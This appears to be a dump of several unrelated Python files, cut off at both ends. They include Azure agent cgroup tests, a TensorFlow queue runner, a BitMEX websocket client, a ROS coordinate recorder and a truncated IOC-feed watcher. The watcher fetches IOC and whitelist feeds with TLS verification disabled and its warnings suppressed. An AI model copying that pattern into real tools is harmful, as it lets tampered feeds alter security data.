self.assertEqual(1, len(extension_calls), "The extension should have been invoked exactly once")
self.assertIn("systemd-run", extension_calls[0],
"The first call to the extension should have used systemd")
self.assertEqual(context_manager.exception.code, ExtensionErrorCodes.PluginUnknownFailure)
self.assertIn("Non-zero exit code", ustr(context_manager.exception))
# stdout and stderr should have been truncated, so the scope name doesn't appear in stderr
# even though systemd-run ran
self.assertNotIn("Running scope as unit", ustr(context_manager.exception))
@attr('requires_sudo')
def test_start_extension_command_should_not_use_fallback_option_if_extension_times_out(self, *args): # pylint: disable=unused-argument
self.assertTrue(i_am_root(), "Test does not run when non-root")
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict the mock Popen below
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.utils.extensionprocessutil.wait_for_process_completion_or_timeout",
return_value=[True, None]):
with patch("azurelinuxagent.common.cgroupapi.SystemdCgroupsApi._is_systemd_failure",
return_value=False):
with self.assertRaises(ExtensionError) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="date",
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
self.assertEqual(context_manager.exception.code, ExtensionErrorCodes.PluginHandlerScriptTimedout)
self.assertIn("Timeout", ustr(context_manager.exception))
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_capture_only_the_last_subprocess_output(self, _):
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict the mock Popen below
original_popen = subprocess.Popen
def mock_popen(command, *args, **kwargs):
# Inject a syntax error to the call
systemd_command = command.replace('systemd-run', 'systemd-run syntax_error')
return original_popen(systemd_command, *args, **kwargs)
expected_output = "[stdout]\n{0}\n\n\n[stderr]\n"
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
# We expect this call to fail because of the syntax error
process_output = configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="echo 'very specific test message'",
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
self.assertEqual(expected_output.format("very specific test message"), process_output)
def test_it_should_set_extension_services_cpu_memory_quota(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system"
}
]
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
extension_service_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.extension_service_cpu_accounting)
configurator.set_extension_services_cpu_memory_quota(service_list)
expected_cpu_accounting = "CPUAccounting=yes"
# create drop in files to set those properties
self.assertTrue(os.path.exists(extension_service_cpu_accounting), "{0} was not created".format(extension_service_cpu_accounting))
self.assertTrue(
fileutil.findre_in_file(extension_service_cpu_accounting, expected_cpu_accounting),
"CPUAccounting was not enabled. Expected: {0}. Got:\n{1}".format(expected_cpu_accounting, fileutil.read_file(extension_service_cpu_accounting)))
def test_it_should_set_extension_services_when_quotas_not_defined(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
extension_service_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.extension_service_cpu_accounting)
extension_service_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.extension_service_cpu_quota)
configurator.set_extension_services_cpu_memory_quota(service_list)
self.assertTrue(os.path.exists(extension_service_cpu_accounting),
"{0} was not created".format(extension_service_cpu_accounting))
self.assertFalse(os.path.exists(extension_service_cpu_quota),
"{0} should not have been created during setup".format(extension_service_cpu_quota))
def test_it_should_start_tracking_extension_services_cgroups(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
configurator.start_tracking_extension_services_cgroups(service_list)
tracked = CGroupsTelemetry._tracked
self.assertTrue(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is not being tracked")
def test_it_should_stop_tracking_extension_services_cgroups(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
with patch("os.path.exists") as mock_path:
mock_path.return_value = True
CGroupsTelemetry.track_cgroup(CpuCgroup('extension.service', '/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service'))
configurator.stop_tracking_extension_services_cgroups(service_list)
tracked = CGroupsTelemetry._tracked
self.assertFalse(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is being tracked")
def test_it_should_remove_extension_services_drop_in_files(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
extension_service_cpu_accounting = configurator.mocks.get_mapped_path(
UnitFilePaths.extension_service_cpu_accounting)
configurator.remove_extension_services_drop_in_files(service_list)
self.assertFalse(os.path.exists(extension_service_cpu_accounting),
"{0} should not have been created".format(extension_service_cpu_accounting))
def test_it_should_start_tracking_unit_cgroups(self):
with self._get_cgroup_configurator() as configurator:
configurator.start_tracking_unit_cgroups("extension.service")
tracked = CGroupsTelemetry._tracked
self.assertTrue(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is not being tracked")
def test_it_should_stop_tracking_unit_cgroups(self):
def side_effect(path):
if path == '/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service':
return True
return False
with self._get_cgroup_configurator() as configurator:
with patch("os.path.exists") as mock_path:
mock_path.side_effect = side_effect
CGroupsTelemetry._tracked['/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service'] = \
CpuCgroup('extension.service', '/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service')
configurator.stop_tracking_unit_cgroups("extension.service")
tracked = CGroupsTelemetry._tracked
self.assertFalse(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is being tracked")
def test_check_processes_in_agent_cgroup_should_raise_a_cgroups_exception_when_there_are_unexpected_processes_in_the_agent_cgroup(self):
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict the mock Popen below
# The test script recursively creates a given number of descendant processes, then it blocks until the
# 'stop_file' exists. It produces an output file containing the PID of each descendant process.
test_script = os.path.join(self.tmp_dir, "create_processes.sh")
stop_file = os.path.join(self.tmp_dir, "create_processes.stop")
AgentTestCase.create_script(test_script, """
#!/usr/bin/env bash
set -euo pipefail
if [[ $# != 2 ]]; then
echo "Usage: $0 <output_file> <count>"
exit 1
fi
echo $$ >> $1
if [[ $2 > 1 ]]; then
$0 $1 $(($2 - 1))
else
timeout 30s /usr/bin/env bash -c "while ! [[ -f {0} ]]; do sleep 0.25s; done"
fi
exit 0
""".format(stop_file))
number_of_descendants = 3
def wait_for_processes(processes_file):
def _all_present():
if os.path.exists(processes_file):
with open(processes_file, "r") as file_stream:
_all_present.processes = [int(process) for process in file_stream.read().split()]
return len(_all_present.processes) >= number_of_descendants
_all_present.processes = []
if not wait_for(_all_present):
raise Exception("Timeout waiting for processes. Expected {0}; got: {1}".format(
number_of_descendants, format_processes(_all_present.processes)))
return _all_present.processes
threads = []
try:
#
# Start the processes that will be used by the test. We use two sets of processes: the first set simulates a command executed by the agent
# (e.g. iptables) and its child processes, if any. The second set of processes simulates an extension.
#
agent_command_output = os.path.join(self.tmp_dir, "agent_command.pids")
agent_command = threading.Thread(target=lambda: shellutil.run_command([test_script, agent_command_output, str(number_of_descendants)]))
agent_command.start()
threads.append(agent_command)
agent_command_processes = wait_for_processes(agent_command_output)
extension_output = os.path.join(self.tmp_dir, "extension.pids")
def start_extension():
original_sleep = time.sleep
original_popen = subprocess.Popen
# Extensions are started using systemd-run; mock Popen to remove the call to systemd-run; the test script creates a couple of
# child processes, which would simulate the extension's processes.
def mock_popen(command, *args, **kwargs):
match = re.match(r"^systemd-run --unit=[^\s]+ --scope --slice=[^\s]+ (.+)", command)
is_systemd_run = match is not None
if is_systemd_run:
command = match.group(1)
process = original_popen(command, *args, **kwargs)
if is_systemd_run:
start_extension.systemd_run_pid = process.pid
return process
with patch('time.sleep', side_effect=lambda _: original_sleep(0.1)): # start_extension_command has a small delay; skip it
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
configurator.start_extension_command(
extension_name="TestExtension",
command="{0} {1} {2}".format(test_script, extension_output, number_of_descendants),
cmd_name="test",
timeout=30,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
start_extension.systemd_run_pid = None
extension = threading.Thread(target=start_extension)
extension.start()
threads.append(extension)
extension_processes = wait_for_processes(extension_output)
#
# check_processes_in_agent_cgroup uses shellutil and the cgroups api to get the commands that are currently running;
# wait for all the processes to show up
#
if not wait_for(lambda: len(shellutil.get_running_commands()) > 0 and len(configurator._cgroups_api.get_systemd_run_commands()) > 0):
raise Exception("Timeout while attempting to track the child commands")
#
# Verify that check_processes_in_agent_cgroup raises when there are unexpected processes in the agent's cgroup.
#
# For the agent's processes, we use the current process and its parent (in the actual agent these would be the daemon and the extension
# handler), and the commands started by the agent.
#
# For other processes, we use process 1, a process that already completed, and an extension. Note that extensions are started using
# systemd-run and the process for that commands belongs to the agent's cgroup but the processes for the extension should be in a
# different cgroup
#
def get_completed_process():
random.seed()
completed = random.randint(1000, 10000)
while os.path.exists("/proc/{0}".format(completed)): # ensure we do not use an existing process
completed = random.randint(1000, 10000)
return completed
agent_processes = [os.getppid(), os.getpid()] + agent_command_processes + [start_extension.systemd_run_pid]
other_processes = [1, get_completed_process()] + extension_processes
with patch("azurelinuxagent.common.cgroupconfigurator.CGroupsApi.get_processes_in_cgroup", return_value=agent_processes + other_processes):
with self.assertRaises(CGroupsException) as context_manager:
configurator._check_processes_in_agent_cgroup()
# The list of processes in the message is an array of strings: "['foo', ..., 'bar']"
message = ustr(context_manager.exception)
search = re.search(r'unexpected processes: \[(?P<processes>.+)\]', message)
self.assertIsNotNone(search, "The event message is not in the expected format: {0}".format(message))
reported = search.group('processes').split(',')
self.assertEqual(
len(other_processes), len(reported),
"An incorrect number of processes was reported. Expected: {0} Got: {1}".format(format_processes(other_processes), reported))
for pid in other_processes:
self.assertTrue(
any("[PID: {0}]".format(pid) in reported_process for reported_process in reported),
"Process {0} was not reported. Got: {1}".format(format_processes([pid]), reported))
finally:
# create the file that stops the test processes and wait for them to complete
open(stop_file, "w").close()
for thread in threads:
thread.join(timeout=5)
def test_check_agent_throttled_time_should_raise_a_cgroups_exception_when_the_threshold_is_exceeded(self):
metrics = [MetricValue(MetricsCategory.CPU_CATEGORY, MetricsCounter.THROTTLED_TIME, AGENT_NAME_TELEMETRY, _AGENT_THROTTLED_TIME_THRESHOLD + 1)]
with self.assertRaises(CGroupsException) as context_manager:
CGroupConfigurator._Impl._check_agent_throttled_time(metrics)
self.assertIn("The agent has been throttled", ustr(context_manager.exception), "An incorrect exception was raised")
def test_check_cgroups_should_disable_cgroups_when_a_check_fails(self):
with self._get_cgroup_configurator() as configurator:
checks = ["_check_processes_in_agent_cgroup", "_check_agent_throttled_time"]
for method_to_fail in checks:
patchers = []
try:
# mock 'method_to_fail' to raise an exception and the rest to do nothing
for method_to_mock in checks:
side_effect = CGroupsException(method_to_fail) if method_to_mock == method_to_fail else lambda *_: None
p = patch.object(configurator, method_to_mock, side_effect=side_effect)
patchers.append(p)
p.start()
with patch("azurelinuxagent.common.cgroupconfigurator.add_event") as add_event:
configurator.enable()
configurator.check_cgroups([])
if method_to_fail == "_check_processes_in_agent_cgroup":
self.assertFalse(configurator.enabled(), "An error in {0} should have disabled cgroups".format(method_to_fail))
else:
self.assertFalse(configurator.agent_enabled(), "An error in {0} should have disabled cgroups".format(method_to_fail))
disable_events = [kwargs for _, kwargs in add_event.call_args_list if kwargs["op"] == WALAEventOperation.CGroupsDisabled]
self.assertTrue(
len(disable_events) == 1,
"Exactly 1 event should have been emitted when {0} fails. Got: {1}".format(method_to_fail, disable_events))
self.assertIn(
"[CGroupsException] {0}".format(method_to_fail),
disable_events[0]["message"],
"The error message is not correct when {0} failed".format(method_to_fail))
finally:
for p in patchers:
p.stop()
|
a-lot-of-parallel-tasks.py
|
#!/usr/bin/env python
"""
More complex demonstration of what's possible with the progress bar.
"""
import random
import threading
import time
from prompt_toolkit_dev import HTML
from prompt_toolkit_dev.shortcuts import ProgressBar
def main():
with ProgressBar(
title=HTML('<b>Example of many parallel tasks.</b>'),
bottom_toolbar=HTML('<b>[Control-L]</b> clear <b>[Control-C]</b> abort')) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = []
for i in range(160):
label = 'Task %i' % i
total = random.randrange(50, 200)
sleep_time = random.randrange(5, 20) / 100.
threads.append(threading.Thread(target=run_task, args=(label, total, sleep_time)))
for t in threads:
t.daemon = True
t.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in threads:
while t.is_alive():
t.join(timeout=.5)
if __name__ == '__main__':
main()
|
queue_runner.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create threads to run multiple enqueue ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import tensorflow.python.platform
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.platform import logging
class QueueRunner(object):
"""Holds a list of enqueue operations for a queue, each to be run in a thread.
Queues are a convenient TensorFlow mechanism to compute tensors
asynchronously using multiple threads. For example in the canonical 'Input
Reader' setup one set of threads generates filenames in a queue; a second set
of threads read records from the files, processes them, and enqueues tensors
on a second queue; a third set of threads dequeues these input records to
construct batches and runs them through training operations.
There are several delicate issues when running multiple threads that way:
closing the queues in sequence as the input is exhausted, correctly catching
and reporting exceptions, etc.
The `QueueRunner`, combined with the `Coordinator`, helps handle these issues.
"""
def __init__(self, queue, enqueue_ops):
"""Create a QueueRunner.
On construction the `QueueRunner` adds an op to close the queue. That op
will be run if the enqueue ops raise exceptions.
When you later call the `create_threads()` method, the `QueueRunner` will
create one thread for each op in `enqueue_ops`. Each thread will run its
enqueue op in parallel with the other threads. The enqueue ops do not have
to all be the same op, but it is expected that they all enqueue tensors in
`queue`.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
"""
self._queue = queue
self._enqueue_ops = enqueue_ops
# Close when no more will be produced, but pending enqueues should be
# preserved.
self._close_op = self._queue.close()
# Close and cancel pending enqueues since there was an error and we want
# to unblock everything so we can cleanly exit.
self._cancel_op = self._queue.close(cancel_pending_enqueues=True)
# Protect the count of runs to wait for.
self._lock = threading.Lock()
self._runs = 0
# List of exceptions raised by the running threads.
self._exceptions_raised = []
@property
def exceptions_raised(self):
"""Exceptions raised but not handled by the `QueueRunner` threads.
Exceptions raised in queue runner threads are handled in one of two ways
depending on whether or not a `Coordinator` was passed to
`create_threads()`:
* With a `Coordinator`, exceptions are reported to the coordinator and
forgotten by the `QueueRunner`.
* Without a `Coordinator`, exceptions are captured by the `QueueRunner` and
made available in this `exceptions_raised` property.
Returns:
A list of Python `Exception` objects. The list is empty if no exception
was captured. (No exceptions are captured when using a Coordinator.)
"""
return self._exceptions_raised
# pylint: disable=broad-except
def _run(self, sess, enqueue_op, coord=None):
"""Execute the enqueue op in a loop, close the queue in case of error.
Args:
sess: A Session.
enqueue_op: The Operation to run.
coord: Optional Coordinator object for reporting errors and checking
for stop conditions.
"""
decremented = False
try:
while True:
if coord and coord.should_stop():
break
try:
sess.run(enqueue_op)
except errors.OutOfRangeError:
# This exception indicates that a queue was closed.
with self._lock:
self._runs -= 1
decremented = True
if self._runs == 0:
try:
sess.run(self._close_op)
except Exception as e:
# Intentionally ignore errors from close_op.
logging.vlog(1, "Ignored exception: %s", str(e))
return
except Exception as e:
# This catches all other exceptions.
if coord:
coord.request_stop(e)
else:
logging.error("Exception in QueueRunner: %s", str(e))
with self._lock:
self._exceptions_raised.append(e)
raise
finally:
# Make sure we account for all terminations: normal or errors.
if not decremented:
with self._lock:
self._runs -= 1
def _close_on_stop(self, sess, cancel_op, coord):
"""Close the queue when the Coordinator requests stop.
Args:
sess: A Session.
cancel_op: The Operation to run.
coord: Coordinator.
"""
coord.wait_for_stop()
try:
sess.run(cancel_op)
except Exception as e:
# Intentionally ignore errors from cancel_op.
logging.vlog(1, "Ignored exception: %s", str(e))
# pylint: enable=broad-except
def create_threads(self, sess, coord=None, daemon=False, start=False):
"""Create threads to run the enqueue ops.
This method requires a session in which the graph was launched. It creates
a list of threads, optionally starting them. There is one thread for each
op passed in `enqueue_ops`.
The `coord` argument is an optional coordinator, that the threads will use
to terminate together and report exceptions. If a coordinator is given,
this method starts an additional thread to close the queue when the
coordinator requests a stop.
This method may be called again as long as all threads from a previous call
have stopped.
Args:
sess: A `Session`.
coord: Optional `Coordinator` object for reporting errors and checking
stop conditions.
daemon: Boolean. If `True` make the threads daemon threads.
start: Boolean. If `True` starts the threads. If `False` the
caller must call the `start()` method of the returned threads.
Returns:
A list of threads.
Raises:
RuntimeError: If threads from a previous call to `create_threads()` are
still running.
"""
with self._lock:
if self._runs > 0:
raise RuntimeError(
"Threads are already running from a previous call to Threads() "
"for this queue runner.")
self._runs = len(self._enqueue_ops)
self._exceptions_raised = []
ret_threads = [threading.Thread(target=self._run, args=(sess, op, coord))
for op in self._enqueue_ops]
if coord:
ret_threads.append(threading.Thread(target=self._close_on_stop,
args=(sess, self._cancel_op, coord)))
for t in ret_threads:
if daemon:
t.daemon = True
if start:
t.start()
return ret_threads
def add_queue_runner(qr, collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Adds a `QueueRunner` to a collection in the graph.
When building a complex model that uses many queues it is often difficult to
gather all the queue runners that need to be run. This convenience function
allows you to add a queue runner to a well known collection in the graph.
The companion method `start_queue_runners()` can be used to start threads for
all the collected queue runners.
Args:
qr: A `QueueRunner`.
collection: A `GraphKey` specifying the graph collection to add
the queue runner to. Defaults to `GraphKeys.QUEUE_RUNNERS`.
"""
ops.add_to_collection(collection, qr)
def start_queue_runners(sess=None, coord=None, daemon=True, start=True,
collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Starts all queue runners collected in the graph.
This is a companion method to `add_queue_runner()`. It just starts
threads for all queue runners collected in the graph. It returns
the list of all threads.
Args:
sess: `Session` used to run the queue ops. Defaults to the
default session.
coord: Optional `Coordinator` for coordinating the started threads.
daemon: Whether the threads should be marked as `daemons`, meaning
they don't block program exit.
start: Set to `False` to only create the threads, not start them.
collection: A `GraphKey` specifying the graph collection to
get the queue runners from. Defaults to `GraphKeys.QUEUE_RUNNERS`.
Returns:
A list of threads.
"""
if sess is None:
sess = ops.get_default_session()
threads = []
for qr in ops.get_collection(collection):
threads.extend(qr.create_threads(sess, coord=coord, daemon=daemon,
start=start))
return threads
|
test_model.py
|
import sqlite3
import threading
import unittest
from deepstar.models.model import Model
from .. import deepstar_path
class TestModel(unittest.TestCase):
"""
This class tests the Model class.
"""
def test_init(self):
with deepstar_path():
self.assertEqual(type(Model.db), sqlite3.Connection)
def test_isolation_level(self):
with deepstar_path():
Model.db.execute('CREATE TABLE test (test TEXT)')
Model.db.execute("INSERT INTO test (test) VALUES ('test')")
Model.close()
Model.init()
self.assertEqual(Model.db.execute('SELECT test FROM test').fetchone(), ('test',)) # noqa
def test_foreign_key_constraints(self):
with deepstar_path():
Model.db.execute('CREATE TABLE test1 (id INTEGER PRIMARY KEY)')
Model.db.execute('CREATE TABLE test2 ( fk_test1 INTEGER, FOREIGN KEY(fk_test1) REFERENCES test1(id))') # noqa
with self.assertRaises(sqlite3.IntegrityError):
Model.db.execute('INSERT INTO test2 (fk_test1) VALUES (1)')
def test_check_same_thread(self):
with deepstar_path():
def a():
Model.init()
thread = threading.Thread(target=a)
Model.close()
thread.start()
thread.join()
Model.close()
def test_close(self):
with deepstar_path():
Model.close()
self.assertEqual(Model.db, None)
|
bitmex_websocket.py
|
import hashlib
import hmac
import json
import os
import threading
import time
import traceback
import urllib
import websocket
from datetime import datetime
from src import logger, to_data_frame
def generate_nonce():
return int(round(time.time() * 1000))
def generate_signature(secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
# Parse the url so we can remove the base and extract just the path.
parsedURL = urllib.parse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = (verb + path + str(nonce) + data).encode('utf-8')
signature = hmac.new(secret.encode('utf-8'), message,
digestmod=hashlib.sha256).hexdigest()
return signature
class BitMexWs:
# testnet
testnet = False
# condition that the bot runs on.
is_running = True
# Notification destination listener
handlers = {}
def __init__(self, test=False):
"""
constructor
"""
self.testnet = test
if test:
domain = 'testnet.bitmex.com'
else:
domain = 'www.bitmex.com'
self.endpoint = 'wss://' + domain + '/realtime?subscribe=tradeBin1m:XBTUSD,' \
'tradeBin5m:XBTUSD,tradeBin1h:XBTUSD,tradeBin1d:XBTUSD,instrument:XBTUSD,' \
'margin,position:XBTUSD,wallet,orderBookL2:XBTUSD'
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def __get_auth(self):
"""
get auth info
"""
api_key = os.environ.get(
"BITMEX_TEST_APIKEY") if self.testnet else os.environ.get("BITMEX_APIKEY")
api_secret = os.environ.get(
"BITMEX_TEST_SECRET") if self.testnet else os.environ.get("BITMEX_SECRET")
if len(api_key) > 0 and len(api_secret):
nonce = generate_nonce()
return [
"api-nonce: " + str(nonce),
"api-signature: " +
generate_signature(api_secret, 'GET', '/realtime', nonce, ''),
"api-key:" + api_key
]
else:
logger.info("WebSocket is not authenticating.")
return []
def __start(self):
"""
start the websocket.
"""
while self.is_running:
self.ws.run_forever()
def __on_error(self, ws, message):
"""
On Error listener
:param ws:
:param message:
"""
logger.error(message)
logger.error(traceback.format_exc())
def __on_message(self, ws, message):
"""
On Message listener
:param ws:
:param message:
:return:
"""
try:
obj = json.loads(message)
if 'table' in obj:
if len(obj['data']) <= 0:
return
table = obj['table']
action = obj['action']
data = obj['data']
if table.startswith("tradeBin"):
data[0]['timestamp'] = datetime.strptime(
data[0]['timestamp'][:-5], '%Y-%m-%dT%H:%M:%S')
self.__emit(table, action, to_data_frame([data[0]]))
elif table.startswith("instrument"):
self.__emit(table, action, data[0])
elif table.startswith("margin"):
self.__emit(table, action, data[0])
elif table.startswith("position"):
self.__emit(table, action, data[0])
elif table.startswith("wallet"):
self.__emit(table, action, data[0])
elif table.startswith("orderBookL2"):
self.__emit(table, action, data)
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
def __emit(self, key, action, value):
"""
send data
"""
if key in self.handlers:
self.handlers[key](action, value)
def __on_close(self, ws):
"""
On Close Listener
:param ws:
"""
if 'close' in self.handlers:
self.handlers['close']()
if self.is_running:
logger.info("Websocket restart")
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def on_close(self, func):
"""
on close fn
:param func:
"""
self.handlers['close'] = func
def bind(self, key, func):
"""
bind fn
:param key:
:param func:
"""
if key == '1m':
self.handlers['tradeBin1m'] = func
if key == '5m':
self.handlers['tradeBin5m'] = func
if key == '1h':
self.handlers['tradeBin1h'] = func
if key == '1d':
self.handlers['tradeBin1d'] = func
if key == 'instrument':
self.handlers['instrument'] = func
if key == 'margin':
self.handlers['margin'] = func
if key == 'position':
self.handlers['position'] = func
if key == 'wallet':
self.handlers['wallet'] = func
if key == 'orderBookL2':
self.handlers['orderBookL2'] = func
def close(self):
"""
close websocket
"""
self.is_running = False
self.ws.close()
|
capture_cell_coordinates.py
|
#!/usr/bin/env python
import rospy
import roslib
from std_msgs.msg import Int8, String
import math
import time
import csv
import threading
from geometry_msgs.msg import PoseArray
import sys
import json
#Defining a class
class Record_Coordinates():
def __init__(self):
rospy.init_node('whycon_record_nodes',anonymous=False) # initializing a ros node with name marker_detection
self.whycon_marker = [0,0,0]
rospy.Subscriber('/whycon/poses',PoseArray,self.whycon_data) # Subscribing to topic
self.number_of_nodes = 36
self.block_name_list = ["A1", "B1", "C1", "D1", "E1", "F1", "F2", "E2", "D2", "C2", "B2", "A2", "A3", "B3", "C3", "D3", "E3", "F3","F4", "E4", "D4", "C4", "B4", "A4", "A5", "B5", "C5", "D5", "E5", "F5", "F6", "E6", "D6", "C6", "B6", "A6"]
self.pose_list = []
self.current_index = None
# Callback for /whycon/poses
def whycon_data(self,msg):
pos_x = round(msg.poses[0].position.x,3)
pos_y = round(msg.poses[0].position.y,3)
pos_z = round(msg.poses[0].position.z,3)
self.whycon_marker = [pos_x,pos_y,pos_z]
def keypress_thread(self):
while True:
text = raw_input("Press Enter to lock.")
if not text:
break
def query_yes_no(self, question, default=None):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,"no": False, "n": False}
if default is None:
prompt = " [Y/N]: "
elif default == "yes":
prompt = " [Y/N]: "
elif default == "no":
prompt = " [Y/N]: "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' ""(or 'y' or 'n').\n")
def display_and_lock_whycon_poses(self, index):
while True:
print("\n\nRecord the WhyCon coordinate for: "+self.block_name_list[index]+". Press ENTER to lock.\n")
t1 = threading.Thread(target=self.keypress_thread , args=())
t1.start()
while t1.isAlive():
sys.stdout.write('\rwhy_x: '+'{0:06.3f}'.format(self.whycon_marker[0])+' why_y: '+'{0:06.3f}'.format(self.whycon_marker[1])+' why_z: '+'{0:06.3f}'.format(self.whycon_marker[2]))
sys.stdout.flush()
whycon_marker_locked = list(self.whycon_marker)
time.sleep(0.2)
text_input = raw_input("You have chosen the above pose for "+self.block_name_list[index]+". Press ENTER to commit, any other key to retake value.")
if not text_input:
self.pose_list.append(whycon_marker_locked)
break
def input_position_config(self):
for i in range(self.number_of_nodes):
self.display_and_lock_whycon_poses(i)
def write_config_to_json(self, file_path = 'cell_coords.json'):
pose_dict = dict(zip(self.block_name_list, self.pose_list))
with open(file_path, mode='w') as outfile:
json.dump(pose_dict, outfile)
print("Recording Successful")
if __name__=="__main__":
try:
rec = Record_Coordinates()
rec.input_position_config()
rec.write_config_to_json()
except KeyboardInterrupt:
print("Recording Config Interrupted")
|
watchers.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from app.utils import read_config
from app.classes.iocs import IOCs
from app.classes.whitelist import WhiteList
import requests
import json
import urllib3
import time
from multiprocessing import Process
"""
This file is parsing the watchers present
in the configuration file. This in order to get
automatically new iocs / elements from remote
sources without user interaction.
As of today the default export JSON format from
the backend and unauthenticated HTTP requests
are accepted. The code is little awkward, it'll
be better in a next version ;)
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def watch_iocs():
"""
Retrieve IOCs from the remote URLs defined in config/watchers.
For each (new ?) IOC, add it to the DB.
"""
# Retrieve the URLs from the configuration
urls = read_config(("watchers", "iocs"))
watchers = [{"url": url, "status": False} for url in urls]
while True:
for w in watchers:
if w["status"] == False:
iocs = IOCs()
iocs_list = []
try:
res = requests.get(w["url"], verify=False)
if res.status_code == 200:
content = json.loads(res.content)
iocs_list = content["iocs"] if "iocs" in content else []
to_delete = content["to_delete"] if "to_delete" in content else []
else:
w["status"] = False
except:
w["status"] = False
for ioc in iocs_list:
try:
iocs.add(ioc["type"], ioc["tag"],
ioc["tlp"], ioc["value"], "watcher")
w["status"] = True
except:
continue
for ioc in to_delete:
try:
iocs.delete_by_value(ioc["value"])
w["status"] = True
except:
continue
# If at least one URL haven't be parsed, let's retry in 1min.
if False in [w["status"] for w in watchers]:
time.sleep(60)
else:
break
def watch_whitelists():
"""
Retrieve whitelist elements from the remote URLs
defined in config/watchers. For each (new ?) element,
add it to the DB.
"""
urls = read_config(("watchers", "whitelists"))
watchers = [{"url": url, "status": False} for url in urls]
while True:
for w in watchers:
if w["status"] == False:
whitelist = WhiteList()
elements = []
try:
res = requests.get(w["url"], verify=False)
if res.status_code == 200:
content = json.loads(res.content)
elements = content["elements"] if "elements" in content else []
to_delete = content["to_delete"] if "to_delete" in content else []
else:
w["status"] = False
except:
w["status"] = False
for elem in elements:
try:
